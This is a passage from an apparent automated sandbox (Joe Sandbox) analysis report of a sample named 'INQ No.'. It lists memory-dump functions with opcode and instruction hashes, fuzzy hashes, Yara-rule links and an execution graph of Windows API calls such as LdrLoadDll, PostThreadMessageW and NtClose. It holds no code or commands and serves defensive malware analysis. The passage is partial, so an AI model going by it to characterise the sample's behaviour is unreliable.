                                                                                                                                                                            • Opcode Fuzzy Hash: cc91966c5f5b256d7c71c02360ab7442c854103772a5f8b038f5331dccd5ff8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B21DBB1E116189BEB18CFABD85079EFBF7AFC9200F14C07AD508A6254EB340A468F51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07862E70 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c50ab79d782ea52f80a04c9e8d4dfd06d9f0782a6a0d6eecf8898e2b330857b1
                                                                                                                                                                            • Instruction ID: 168c19fa4c2bb9c8242f241e522d4affde7329452af7263ff06a3bbb7d05db58
                                                                                                                                                                            • Opcode Fuzzy Hash: c50ab79d782ea52f80a04c9e8d4dfd06d9f0782a6a0d6eecf8898e2b330857b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 28E119B4E002599FDB14DFA8C584AAEFBB2FF89304F248169D414AB355D730AD42CFA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078632B8 Relevance: .3, Instructions: 318COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8865e9091435fa073e04c32ccfe5aca0d28780a9c2f0aa291e397f516accc46b
                                                                                                                                                                            • Instruction ID: cf4ed67b6796cb66bd0b728e1313954fe50691ce236c0ef40464ac654d0ba448
                                                                                                                                                                            • Opcode Fuzzy Hash: 8865e9091435fa073e04c32ccfe5aca0d28780a9c2f0aa291e397f516accc46b
                                                                                                                                                                            • Instruction Fuzzy Hash: 86E1F7B4E002599FDB14CFA9C584AAEFBB2FF89304F248169D414AB355DB30AD41CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C0B60 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 98f796dc63901a483dba0eb7c0f59e9c49deb77c7c51660b018f7ebc44d0c0db
                                                                                                                                                                            • Instruction ID: b359c6dc46b5a63058ee7dff151686d6fbfc097b4029a7b3f8b18e56f967612c
                                                                                                                                                                            • Opcode Fuzzy Hash: 98f796dc63901a483dba0eb7c0f59e9c49deb77c7c51660b018f7ebc44d0c0db
                                                                                                                                                                            • Instruction Fuzzy Hash: 101296B44017458BE318EF65EC4C1897FB6FB4A328B504309DA612B2E9DBB415CACF6C
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07863700 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: caf07e5d50c980cb3fba9f545b6c9597e3dbfe73e83d29ceccde4e5c1d03e782
                                                                                                                                                                            • Instruction ID: df02f6eab284d72bd959e8fab76a4a40cd3c4938e2f1ba0e7a25115b14c6f5c6
                                                                                                                                                                            • Opcode Fuzzy Hash: caf07e5d50c980cb3fba9f545b6c9597e3dbfe73e83d29ceccde4e5c1d03e782
                                                                                                                                                                            • Instruction Fuzzy Hash: 11E1F7B4E002599FDB14CFA9C584AAEFBB2FF89304F248169D414AB355DB34AD41CFA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07864DA8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1ef2183614d1a4e5c190dd25f4f61723fe22ac2446b836136ecc293ed8438f11
                                                                                                                                                                            • Instruction ID: 65661fa41257735080d9ee42aefef855f3f697fecc5c3bf8efa8eb79376f2717
                                                                                                                                                                            • Opcode Fuzzy Hash: 1ef2183614d1a4e5c190dd25f4f61723fe22ac2446b836136ecc293ed8438f11
                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE11AB4E002599FDB14CFA8C584AAEFBB2FF89304F248169D414AB355DB30AD41CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078651E0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2c39bcd60623ffb906c46655c77f6a70621057c84051ce4c45ae00482ced99c3
                                                                                                                                                                            • Instruction ID: 5d4823ef496970ab8b6e808756dedaa7be91c64a44aa707130490b875fc0108b
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c39bcd60623ffb906c46655c77f6a70621057c84051ce4c45ae00482ced99c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 54E1D7B4E002599FDB14CFA9C584AAEBBB2FF89304F248169E414EB355D730AD41CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07868C18 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8e6a88dfde43e6ca64dc1d0618527cc76c612a9297372acfe18ff240b2bc7eed
                                                                                                                                                                            • Instruction ID: ec98d97fb37ee40273ad6841d375b4df966583408e5e0fe3e403ca51359f44b7
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e6a88dfde43e6ca64dc1d0618527cc76c612a9297372acfe18ff240b2bc7eed
                                                                                                                                                                            • Instruction Fuzzy Hash: F5D1E5B4A00609CFDB14DF69C588AA9B7F1BF5C315F2580A8E509EB361DB31AD40CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DF148 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4aac8822d80992895bcb1a43e6d7f51ed3fc7556a7917636c8bdd2bc7bf94929
                                                                                                                                                                            • Instruction ID: d38a62ef9ce3874c0233f4e9ad7857d2ae78facfe140a33bd3c5345ee0e30ea8
                                                                                                                                                                            • Opcode Fuzzy Hash: 4aac8822d80992895bcb1a43e6d7f51ed3fc7556a7917636c8bdd2bc7bf94929
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D13B35D1075A8ACB20EB64D8A469DB7B1FFA5300F10C79AE54977224EF706AC5CF81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C01A0 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f664c8a08a5aa81ade4c320353d6906c7ce9d24b5aa99b9f87004326e8b9b6e8
                                                                                                                                                                            • Instruction ID: 69318dbd28f1d256b62d3bc7b4b9e650aad1e9dedd02a6523662bcd571d3ee36
                                                                                                                                                                            • Opcode Fuzzy Hash: f664c8a08a5aa81ade4c320353d6906c7ce9d24b5aa99b9f87004326e8b9b6e8
                                                                                                                                                                            • Instruction Fuzzy Hash: BEA15131A00609CFCF09DFA4C8849DEBBB2FF85300B1545ADE806BB265DB71EA55DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C0B50 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f0e15ebdfd193d26768856fdcdf594bbd0429a726e32586fb755e2a3083ddd3d
                                                                                                                                                                            • Instruction ID: fc44815bdfa5b19169d52af13196887f28b642c245b76ad7e6da76f70a4b086c
                                                                                                                                                                            • Opcode Fuzzy Hash: f0e15ebdfd193d26768856fdcdf594bbd0429a726e32586fb755e2a3083ddd3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 2AC10BB18017458BD718EF69EC4C1897BB7FB8A328F504309D5616B2E9DBB414CACF68
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DAA60 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 20d72e8c7b3bc24e5c05660b357c500014a0210642d7020dfe87a8fb2c9b39ee
                                                                                                                                                                            • Instruction ID: 4e22a0092e4f88e0315aed21f66f85a3439ae96622f8dcae78d3d86628e2dc62
                                                                                                                                                                            • Opcode Fuzzy Hash: 20d72e8c7b3bc24e5c05660b357c500014a0210642d7020dfe87a8fb2c9b39ee
                                                                                                                                                                            • Instruction Fuzzy Hash: 3181B1B4E11219CFCB48CF9AC58499EBBF2FF89250F24955AD415AB320D334AE42CF95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078D8770 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0e040d4fdcb26b5e7ba124469069345eb4cc28ed99fe33359b37179802a48e2b
                                                                                                                                                                            • Instruction ID: 861828b69e28b3f14dbe214d778e42944488855ae32b3cef943484ba76c91453
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e040d4fdcb26b5e7ba124469069345eb4cc28ed99fe33359b37179802a48e2b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D7105B4E1120AEFCB04CF99D4819AEFBB2FB99310F14852AD515EB354D734AA81CF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DBED0 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1d6e8c224f108e2e7ceb0f5866677dd56a9c7a01b790daff16ead7f9c8f6adca
                                                                                                                                                                            • Instruction ID: 241d2db6b81f96c9c26fd7f367e4dab331a54964bf592685bdc85b9681ad62ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d6e8c224f108e2e7ceb0f5866677dd56a9c7a01b790daff16ead7f9c8f6adca
                                                                                                                                                                            • Instruction Fuzzy Hash: 0D61E4B092660DDFD704CF92EA86599BFB1FB89308F21D495C0C9D7158DB348A66CB14
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DB918 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 788bf245b5dfdf85146a03ec00c087d37cdfb0fe638f48ad2f0672706d09993e
                                                                                                                                                                            • Instruction ID: 64debe656ee0c351294548297e31992b53382432f7a5c9b2e42b6473a4f5ac80
                                                                                                                                                                            • Opcode Fuzzy Hash: 788bf245b5dfdf85146a03ec00c087d37cdfb0fe638f48ad2f0672706d09993e
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C6104B0E1124AEBCB04CFAAC5815EEFFB6FF99200F15801AD525B7214E3349A418F95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DD8A8 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 95d81c738bd931f6fff14c2d63d06c844e8b7ed2798c03ffd3a8d13e0a3d980b
                                                                                                                                                                            • Instruction ID: 842f12ea7128e01f390fbd7eafe8fd1ed61e300b94ce54ab48e6f3f2a872427f
                                                                                                                                                                            • Opcode Fuzzy Hash: 95d81c738bd931f6fff14c2d63d06c844e8b7ed2798c03ffd3a8d13e0a3d980b
                                                                                                                                                                            • Instruction Fuzzy Hash: 725148B0E1520ADFCB04CFAAD4855AEFBF2BF89210F20942AD515F7354DB345A028FA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078651D0 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a86a95361b3b0d96ac83b57a02c964e4fa1b1f52fcfd8b56d7c720a8d3a901f5
                                                                                                                                                                            • Instruction ID: 4c7dce0a7ae86a3a606bea65f293d1051195df4cc69dd5a93fb35c88ddccd054
                                                                                                                                                                            • Opcode Fuzzy Hash: a86a95361b3b0d96ac83b57a02c964e4fa1b1f52fcfd8b56d7c720a8d3a901f5
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A5127B4E002198FDB14CFA9C5845AEFBF2BF8A204F24816AD418AB355D7309D42CFA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07864D99 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f25577802f1f757739b54c652cd8db2f4eef4f28c7c6c217b382d5374d0c4874
                                                                                                                                                                            • Instruction ID: e89e5106d751870f6746c2391371e0d74c9a56db8e46bbee73b88b0299673185
                                                                                                                                                                            • Opcode Fuzzy Hash: f25577802f1f757739b54c652cd8db2f4eef4f28c7c6c217b382d5374d0c4874
                                                                                                                                                                            • Instruction Fuzzy Hash: C6512AB4E002599BDB14CFA9C5446AEFBF2FF89304F248169D418AB356D7319E42CFA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078D0006 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b4193de05ab610955e4ecb0e04baab42a7c8255352994989b7613c201bebd502
                                                                                                                                                                            • Instruction ID: 592cdf67d74a1be531efdf1fadb1288d9cfb097c486606ee169ad191b87a8297
                                                                                                                                                                            • Opcode Fuzzy Hash: b4193de05ab610955e4ecb0e04baab42a7c8255352994989b7613c201bebd502
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F4192B1D056588FDB19CF6B8C4028AFBF3AFC9210F18C1BAC45CAB215EA3509568F51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078D0040 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3a726a20c36cde79b966e5565becd284b30aed885981c76d2e05789cec2e5d48
                                                                                                                                                                            • Instruction ID: b6e65f19130ded2e2dd6e73b4fe9b81a547572b6c8e186b7b11c6b19fac1728e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a726a20c36cde79b966e5565becd284b30aed885981c76d2e05789cec2e5d48
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B4153B1D016598BEB1CCF6B8D4469EFBF7AFC9301F18C1BA841CAA254DB3409458F50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 078DBC88 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1c7a8315a02d79922c93bba7adcd2c3a628ccb1ff4dc807dbf6ed9d1d02c467d
                                                                                                                                                                            • Instruction ID: fd529e45738088d78e6e1545b744424b849ba1916abd53ffd49ba19471e633df
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7a8315a02d79922c93bba7adcd2c3a628ccb1ff4dc807dbf6ed9d1d02c467d
                                                                                                                                                                            • Instruction Fuzzy Hash: C741D1B0E0020ADFDB08CFAAC4855AEFBF2BF89310F24D12AC415E7244D7349A518FA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:1.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:4.9%
                                                                                                                                                                            Signature Coverage:2.8%
                                                                                                                                                                            Total number of Nodes:142
                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                            execution_graph 93101 42a863 93102 42a880 93101->93102 93105 f12df0 LdrInitializeThunk 93102->93105 93103 42a8a8 93105->93103 93106 4243e3 93111 4243f2 93106->93111 93107 424476 93108 424436 93114 42d113 93108->93114 93111->93107 93111->93108 93112 424471 93111->93112 93113 42d113 RtlFreeHeap 93112->93113 93113->93107 93117 42b5a3 93114->93117 93116 424443 93118 42b5bd 93117->93118 93119 42b5ce RtlFreeHeap 93118->93119 93119->93116 93120 424053 93121 42406f 93120->93121 93122 424097 93121->93122 93123 4240ab 93121->93123 93124 42b233 NtClose 93122->93124 93130 42b233 93123->93130 93126 4240a0 93124->93126 93127 4240b4 93133 42d233 RtlAllocateHeap 93127->93133 93129 4240bf 93131 42b250 93130->93131 93132 42b261 NtClose 93131->93132 93132->93127 93133->93129 93134 428953 93135 4289b0 93134->93135 93136 4289e3 93135->93136 93139 413833 93135->93139 93138 4289c5 93140 4137f8 93139->93140 93142 413847 93139->93142 93144 42b4b3 93140->93144 93142->93138 93145 42b4cd 93144->93145 93148 f12c70 LdrInitializeThunk 93145->93148 93146 413815 93146->93138 93148->93146 93149 f12b60 LdrInitializeThunk 93150 42e1f3 93151 42e203 93150->93151 93152 42e209 93150->93152 93155 42d1f3 93152->93155 93154 42e22f 93158 42b553 93155->93158 93157 42d20e 93157->93154 93159 42b570 93158->93159 93160 42b581 RtlAllocateHeap 93159->93160 93160->93157 93161 413c73 93162 413c8d 93161->93162 93167 417673 93162->93167 93164 413cab 93165 413cf0 93164->93165 93166 413cdf PostThreadMessageW 93164->93166 93166->93165 93168 417697 93167->93168 93169 4176d3 LdrLoadDll 93168->93169 93170 41769e 93168->93170 93169->93170 93170->93164 93171 41acd3 93172 41ad17 93171->93172 93173 41ad38 93172->93173 93174 42b233 NtClose 93172->93174 93174->93173 93175 41ddf3 93176 41de19 93175->93176 93180 41df07 93176->93180 93181 42e323 93176->93181 93178 41deab 93178->93180 93187 42a8b3 93178->93187 93182 42e293 93181->93182 93183 42e2f0 93182->93183 93184 42d1f3 RtlAllocateHeap 93182->93184 93183->93178 93185 42e2cd 93184->93185 93186 42d113 RtlFreeHeap 93185->93186 93186->93183 93188 42a8d0 93187->93188 93191 f12c0a 93188->93191 93189 42a8fc 93189->93180 93192 f12c11 93191->93192 93193 f12c1f LdrInitializeThunk 93191->93193 93192->93189 93193->93189 93194 401ab8 93195 401ad5 93194->93195 93198 42e6b3 93195->93198 93201 42cd13 93198->93201 93202 42cd36 93201->93202 93213 407243 93202->93213 93204 42cd4c 93212 401b45 93204->93212 93216 41aae3 93204->93216 93206 42cd6b 93207 42cd80 93206->93207 93231 42b5f3 93206->93231 93227 427303 93207->93227 93210 42cd8f 93211 42b5f3 ExitProcess 93210->93211 93211->93212 93234 4163a3 93213->93234 93215 407250 93215->93204 93217 41ab0f 93216->93217 93245 41a9d3 93217->93245 93220 41ab54 93223 42b233 NtClose 93220->93223 93224 41ab70 93220->93224 93221 41ab3c 93222 42b233 NtClose 93221->93222 93225 41ab47 93221->93225 93222->93225 93226 41ab66 93223->93226 93224->93206 93225->93206 93226->93206 93228 42735d 93227->93228 93230 42736a 93228->93230 93256 4181c3 93228->93256 93230->93210 93232 42b610 93231->93232 93233 42b621 ExitProcess 93232->93233 93233->93207 93235 4163ba 93234->93235 93237 4163d3 93235->93237 93238 42bc93 93235->93238 93237->93215 93239 42bcab 93238->93239 93240 42bccf 93239->93240 93241 42a8b3 LdrInitializeThunk 93239->93241 93240->93237 93242 42bd24 93241->93242 93243 42d113 RtlFreeHeap 93242->93243 93244 42bd39 93243->93244 93244->93237 93246 41a9ed 93245->93246 93250 41aac9 93245->93250 93251 42a953 93246->93251 93249 42b233 NtClose 93249->93250 93250->93220 93250->93221 93252 42a970 93251->93252 93255 f135c0 LdrInitializeThunk 93252->93255 93253 41aabd 93253->93249 93255->93253 93258 4181ed 93256->93258 93257 41865b 93257->93230 93258->93257 93264 413da3 93258->93264 93260 4182fa 93260->93257 93261 42d113 RtlFreeHeap 93260->93261 93262 418312 93261->93262 93262->93257 93263 42b5f3 ExitProcess 93262->93263 93263->93257 93271 413dc2 93264->93271 93265 413f17 93265->93260 93267 413ef4 93267->93265 93275 41adf3 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 93267->93275 93268 413ee0 93268->93265 93274 41adf3 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 93268->93274 93270 413f0d 93270->93260 93271->93265 93271->93268 93273 4137f3 LdrInitializeThunk 93271->93273 93273->93268 93274->93267 93275->93270 93276 418878 93277 42b233 NtClose 93276->93277 93278 418882 93277->93278

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 00417673 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

